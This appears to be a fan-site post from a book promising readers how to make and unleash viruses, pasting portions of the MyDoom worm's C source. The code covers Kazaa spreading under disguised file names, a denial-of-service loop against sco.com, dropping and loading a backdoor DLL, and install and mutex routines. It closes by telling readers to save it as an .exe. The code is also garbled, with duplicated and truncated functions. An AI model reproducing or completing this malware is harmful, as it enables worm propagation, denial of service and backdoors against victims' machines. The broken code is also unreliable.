ok @TheLonelyCone , here you go with your 'Favorited Virus' info. mydoom was called MyDom or MyDomain.
char *kazaa_names[] = {
"jvanzc5",
"vpd2004-svany",
"npgvingvba_penpx",
"fgevc-tvey-2.0o" /* missed comma in the original version */
"qpbz_cngpurf",
"ebbgxvgKC",
"bssvpr_penpx",
"ahxr2004"
};
static void kazaa_spread(char *file)
{
int kazaa_names_cnt = sizeof(kazaa_names) / sizeof(kazaa_names[0]);
char kaza[256];
DWORD kazalen=sizeof(kaza);
HKEY hKey;
char key_path[64], key_val[32];
// Software\Kazaa\Transfer
rot13(key_path, "Fbsgjner\\Xnmnn\\Genafsre");
rot13(key_val, "QyQve0"); // "DlDir0"
// Get the path to Kazaa from the registry
ZeroMemory(kaza, kazalen);
if
(RegOpenKeyEx(HKEY_CURRENT_USER,key_path,0,KEY_QUERY_VALUE,&hKe
y)) return;
if (RegQueryValueEx(hKey, key_val, 0, NULL, (PBYTE)kaza, &kazalen))
return;
RegCloseKey(hKey);
if (kaza[0] == 0) return;
if (kaza[lstrlen(kaza)-1] == '/') kaza[lstrlen(kaza)-1] = '\\';
if (kaza[lstrlen(kaza)-1] != '\\') lstrcat(kaza, "\\");
rot13(kaza+lstrlen(kaza), kazaa_names[xrand16() % kazaa_names_cnt]);
lstrcat(kaza, ".");
switch (xrand16() % 6) {
case 0: case 1: lstrcat(kaza, "ex"); lstrcat(kaza, "e"); break;
case 2: case 3: lstrcat(kaza, "sc"); lstrcat(kaza, "r"); break;
case 4: lstrcat(kaza, "pi"); lstrcat(kaza, "f"); break;
default: lstrcat(kaza, "ba"); lstrcat(kaza, "t"); break;
}
CopyFile(file,kaza,TRUE);
static DWORD _stdcall scodos_th(LPVOID pv)
{
struct sockaddr_in addr;
char buf[512];
int sock;
rot13(buf,
/*
* "GET / HTTP/1.1
"
* "Host: www.sco.com
"
* "
";
*/
"TRG / UGGC/1.1
"
"Ubfg: " SCO_SITE_ROT13 "
"
"
");
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_BELOW_NORMAL);
if (pv == NULL) goto ex;
addr = *(struct sockaddr_in *)pv;
for (;;) {
sock = connect_tv(&addr, 8);
if (sock != 0) {
send(sock, buf, lstrlen(buf), 0);
Sleep(300);
closesocket(sock);
}
}
ex: ExitThread(0);
return 0;
}
void payload_xproxy(struct sync_t *sync)
{
char fname[20], fpath[MAX_PATH+20];
HANDLE hFile;
int i;
rot13(fname, "fuvztncv.qyy"); /* "shimgapi.dll" */
sync->xproxy_state = 0;
for (i=0; i<2; i++) {
if (i == 0)
GetSystemDirectory(fpath, sizeof(fpath));
else
GetTempPath(sizeof(fpath), fpath);
if (fpath[0] == 0) continue;
if (fpath[lstrlen(fpath)-1] != '\\') lstrcat(fpath, "\\");
lstrcat(fpath, fname);
hFile = CreateFile(fpath, GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {
if (GetFileAttributes(fpath) ==
INVALID_FILE_ATTRIBUTES)
continue;
sync->xproxy_state = 2;
lstrcpy(sync->xproxy_path, fpath);
break;
}
decrypt1_to_file(xproxy_data, sizeof(xproxy_data), hFile);
CloseHandle(hFile);
sync->xproxy_state = 1;
lstrcpy(sync->xproxy_path, fpath);
break;
}
if (sync->xproxy_state == 1) {
LoadLibrary(sync->xproxy_path);
sync->xproxy_state = 2;
}
}
void sync_check_frun(struct sync_t *sync)
{
HKEY k;
DWORD disp;
char i, tmp[128];
/*
"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\Version" */
rot13(tmp,
"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\PbzQyt32\\Irefvba");
sync->first_run = 0;
for (i=0; i<2; i++)
if (RegOpenKeyEx((i == 0) ? HKEY_LOCAL_MACHINE :
HKEY_CURRENT_USER,
tmp, 0, KEY_READ, &k) == 0) {
RegCloseKey(k);
return;
}
sync->first_run = 1;
for (i=0; i<2; i++)
if (RegCreateKeyEx((i == 0) ? HKEY_LOCAL_MACHINE :
HKEY_CURRENT_USER,
tmp, 0, NULL, 0, KEY_WRITE, NULL, &k, &disp) == 0)
RegCloseKey(k);
}
int sync_mutex(struct sync_t *sync)
{
char tmp[64];
rot13(tmp, "FjroFvcpFzgkF0"); /* "SwebSipcSmtxS0" */
CreateMutex(NULL, TRUE, tmp);
return (GetLastError() == ERROR_ALREADY_EXISTS) ? 1 : 0;
}
void sync_install(struct sync_t *sync)
{
char fname[20], fpath[MAX_PATH+20], selfpath[MAX_PATH];
HANDLE hFile;
int i;
rot13(fname, "gnfxzba.rkr"); /* "taskmon.exe" */
GetModuleFileName(NULL, selfpath, MAX_PATH);
lstrcpy(sync->sync_instpath, selfpath);
void sync_check_frun(struct sync_t *sync)
{
HKEY k;
DWORD disp;
char i, tmp[128];
/*
"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\Version" */
rot13(tmp,
"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\PbzQyt32\\Irefvba");
sync->first_run = 0;
for (i=0; i<2; i++)
if (RegOpenKeyEx((i == 0) ? HKEY_LOCAL_MACHINE :
HKEY_CURRENT_USER,
tmp, 0, KEY_READ, &k) == 0) {
RegCloseKey(k);
return;
}
sync->first_run = 1;
for (i=0; i<2; i++)
if (RegCreateKeyEx((i == 0) ? HKEY_LOCAL_MACHINE :
HKEY_CURRENT_USER,
tmp, 0, NULL, 0, KEY_WRITE, NULL, &k, &disp) == 0)
RegCloseKey(k);
}
int sync_mutex(struct sync_t *sync)
{
char tmp[64];
rot13(tmp, "FjroFvcpFzgkF0"); /* "SwebSipcSmtxS0" */
CreateMutex(NULL, TRUE, tmp);
return (GetLastError() == ERROR_ALREADY_EXISTS) ? 1 : 0;
}
void sync_install(struct sync_t *sync)
{
char fname[20], fpath[MAX_PATH+20], selfpath[MAX_PATH];
HANDLE hFile;
int i;
rot13(fname, "gnfxzba.rkr"); /* "taskmon.exe" */
GetModuleFileName(NULL, selfpath, MAX_PATH);
lstrcpy(sync->sync_instpath, selfpath);
save with .exe (executable) extension.
GG I win
YOU ARE READING
☠️ Viruses - All You Need To Know✅
Non-FictionWant to know how to make your own virus and unleash it? Wanna Know source codes of viruses? Wanna know more about viruses? (+A Fun Fact!) You're in the Right place! Enjoy! Please consider leaving a vote. Thanks!
